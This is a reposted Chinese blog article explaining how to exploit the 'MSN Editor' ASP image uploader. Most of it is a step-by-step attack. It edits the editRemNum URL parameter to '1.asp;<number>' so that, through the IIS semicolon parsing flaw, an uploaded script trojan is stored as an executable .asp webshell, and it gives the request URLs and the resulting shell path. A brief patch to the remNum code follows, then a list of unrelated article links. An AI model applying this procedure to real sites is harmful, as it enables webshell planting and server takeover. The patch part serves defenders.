MSN Editor编辑器漏洞利用
来源:互联网 发布:足球大师捏脸数据库 编辑:程序博客网 时间:2024/05/29 11:11
简单说下利用的方法吧
点击图片上传后会出现上传页面,地址为
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=
用普通的图片上传后,地址为
http://www.xxx.cn/news/uppic/41513102009204012_1.gif
记住这时候的路径
在点击图片的上传,这时候地址就变成了
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012
很明显。图片的地址是根据RemNum后面的编号生成的。
利用很简单 配合IIS的解析漏洞,把RemNum后面的数据修改为1.asp;41513102009204012
变成下面这个地址
http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012
然后在浏览器里打开
然后选择你的脚本木马上传
将会返回下面的地址
uppic/1.asp;41513102009204012_2.gif
然后直接打开就是我们的小马地址!
加上修补方法!
by:想你挡挡闯墙
关键代码:
if editRemNum<>"" then
remNum = editRemNum
else
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
end if
哎,先不讲解了 。
去掉自定义部分,只留下随即参数即可。
保留代码:
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
文章来源: by 情博客
- MSN Editor编辑器漏洞利用
- eWebSoft在线编辑器漏洞利用技巧!
- eWebSoft在线编辑器漏洞利用技巧
- 利用Editor.md构建Markdown富文本编辑器
- 文本编辑器editor.php
- 163Editor 编辑器概览
- Svg-Editor在线编辑器
- [AHOI2006]文本编辑器editor
- BZOJ1269 文本编辑器Editor
- 文本编辑器 Editor
- Sprite Editor【精灵编辑器】
- 百度Editor文本编辑器
- Unity Editor编辑器(MenuItem)
- 利用MSN协议开发
- Editor:实用的在线编辑器(WYSIWYG Editor)
- 【Editor】 Unity3D Editor 编辑器简易教程
- MSN.com上的跨站漏洞
- 关于MSN的密码验证漏洞
- 设计网站的URL时应该注意的8个要点
- JS细节性代码积累
- .net 网站中英文切换
- Eucalyptus管理员手册--目录
- css技巧
- MSN Editor编辑器漏洞利用
- C++实现Vector类
- sigma(n^m)
- 内存泄露和内存溢出是什么?他们之间的区别是什么?
- Linux and windows Porting
- 用eclipse开发Minix
- Android id的理解
- ExtJS简单示例
- 嗨